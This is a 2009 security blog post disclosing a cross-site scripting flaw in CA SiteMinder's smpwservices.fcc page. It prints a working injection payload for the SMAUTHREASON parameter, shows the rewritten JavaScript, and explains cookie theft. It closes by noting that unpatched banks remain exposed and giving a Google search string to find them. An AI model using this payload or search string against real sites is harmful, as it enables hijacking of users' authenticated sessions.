Monday, July 27, 2009

Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting

CA Siteminder is a centralized Web access management system that enables user authentication and single sign-on, authentication management, policy-based authorization, identity federation and auditing of access to Web applications and portals.

During a pentest activity at the end of 2007 I met this product so I started out to analyse its html source code. The following Javascript code got my attention:

function resetCredFields()
{
    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}                                       

The value "X" is under the user control and could be used to inject arbitrary code into the resetCredFields() javascript function. Unfortunately the filters applied deny the submission of common XSS chars such as "<" or ">". At first sight it seemed to be not vulnerable to injection but after a few reasoning I deducted that a way would has been possible. A malicious Javascript code could be injected in a recursive manner into the original code. Due to the necessity to drop a part of the original code after the injection I thought to insert a code such as the following into the SMAUTHREASON parameter:

1)alert(document.cookie);}function+drop(){if(0

In this way the resulting injected code appear like the following:

function resetCredFields()
{

if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 4 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 5 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 28 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 1 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 18 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 20 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 22 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>

At the execution point of resetCredFields() function the execution of our arbitrary javascript code will be granted.

An attacker could use this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site,once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Unfortunately no remedy is available as of June 27th 2009 and several banking and financial institutions are still vulnerable to that vulnerability. Try to search the string inurl:"smpwservices.fcc" through google...the proof of the pudding.



Related links
http://www.securityfocus.com/bid/26375
http://supportconnectw.ca.com/public/antivirus/infodocs/casiteminder-secnotice.asp
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5923
http://xforce.iss.net/xforce/xfdb/38395